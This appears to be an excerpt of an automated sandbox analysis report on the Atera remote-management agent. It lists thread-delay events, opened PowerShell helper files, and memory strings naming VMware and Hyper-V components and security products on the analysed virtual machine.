Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596796
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596572
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596468
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596359
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596249
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596140
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596031
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 595922
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 595812
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 595703
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599890
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599781
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599672
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599453
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598906
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598795
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598578
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598468
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598359
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598250
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598138
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598031
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597909
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597781
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597671
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597452
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596797
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596678
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596453
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595906
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595797
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595578
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595462
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595358
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595248
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595117
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594905
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594796
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594577
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594468
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599813
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599688
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599553
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599416
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599306
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599188
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599078
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598966
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598860
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598739
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598610
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598485
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598360
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598235
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598110
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597985
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597860
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597735
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597621
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597500
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597391
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597266
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597141
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597030
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596922
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596791
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596681
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596573
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596464
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596346
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596219
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596105
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595957
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595828
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595699
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595578
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595450
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595321
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595203
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595094
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594983
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594868
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594750
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594630
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594500
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594391
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594282
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594157
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594032
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 593907
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 593782
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1

Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service0
Source: AgentPackageMonitoring.exe, 00000033.00000002.2691494022.00000256F1230000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat.
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 6VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2292508392.00000150D7AEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
Source: svchost.exe, 00000023.00000002.2944065031.0000018CCBE13000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A0VMwareVirtual disk
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM2
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2293365462.00000150D7B80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AEBF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167AE73000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2217394716.00000247F88AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.2
Source: AgentPackageProgramManagement.exe, 00000036.00000000.2502915030.0000011CB23F2000.00000002.00000001.01000000.0000002B.sdmp	Binary or memory string: VMware Tools)Cisco Webex Meetings
Source: AgentPackageMonitoring.exe, 00000033.00000002.2691494022.00000256F1230000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Inc.NoneVMware
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: svchost.exe, 00000023.00000003.2205466004.0000018CCC123000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
Source: svchost.exe, 00000023.00000002.2946064407.0000018CCBEF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @manufacturer"vmware"
Source: AgentPackageHeartbeat.exe, 00000039.00000002.2580997801.000002A34B5F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll((.J
Source: AgentPackageAgentInformation.exe, 00000014.00000000.2004500560.0000028A55182000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2549890793.000001F1633C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStoppedM
Source: svchost.exe, 00000023.00000003.2464062928.0000018CCC01A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1A
Source: svchost.exe, 00000023.00000002.2946064407.0000018CCBEF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *@"VMware Virtual disk"
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service0
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2548326525.000001F163349000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServicevmicshutdownvmicshutdownStopped
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: svchost.exe, 00000023.00000002.2944621683.0000018CCBE4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JSetPropValue.Manufacturer("VMware");
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachine
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware-56 4d 43
Source: AteraAgent.exe, 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@l7r
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStopped,J
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14ADE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2549890793.000001F1633C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped`
Source: AgentPackageMonitoring.exe, 00000033.00000002.2691494022.00000256F1230000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VM
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface0
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
